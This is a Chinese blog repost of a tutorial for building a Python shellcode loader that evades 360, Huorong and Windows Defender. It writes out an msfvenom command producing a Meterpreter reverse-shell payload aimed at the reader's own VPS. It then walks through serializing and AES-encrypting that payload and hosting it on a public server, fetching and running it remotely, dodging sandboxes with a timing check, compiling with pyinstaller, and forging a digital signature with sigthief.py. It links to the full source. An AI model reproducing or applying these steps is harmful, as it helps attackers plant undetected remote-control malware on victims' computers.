Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

admin 2024年1月16日17:54:46评论56 views字数 638阅读2分7秒阅读模式

反序列化+远程分离免杀+反沙箱

首先也是通过

msfvenom -p windows/x64/meterpreter/reverse LHOST=你的vps地址 LPORT=4444 -f c -b 'x00' 生成shellcode

然后在线base64加密网址

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

将加密好的shellcode放入如下图的Piggo.py文件下的input_kali

(文章末尾回复免杀002获取源码)

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

这里对整个shellcode加载器进行序列化处理,并为base64的形式

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

在把序列化好的base64放入AES-Pig.py文件再进行一轮AES加密处理,目的在于防止杀软逆向回来

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

将加密好的AES密文另存为.txt,并放在可以访问的公网VPS上

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

然后来到codePig.py文件下

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

实现分离免杀远程请求回来的AES密文解密后进入判断是否在沙箱,不是就进行反序列化并base64解密执行shellcode

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

反沙箱也是一样的通过判断时间来确定是否在沙箱环境内

使用命令编译exe:
pyinstaller.exe -F -w -i 你的ico图标 codePig.py

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

这里使用sigthief.py注入数字签名

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

免杀效果:

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

核晶防护下正常反弹MSF并执行命令

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

火绒

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

Windows defender

公众号获取源码

链接:https://pan.quark.cn/s/60834c86b92e

2024祝各位师傅们挖洞多多

原文始发于微信公众号(PwnPigPig):Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月16日17:54:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defenderhttps://cn-sec.com/archives/2399012.html

发表评论

匿名网友 填写信息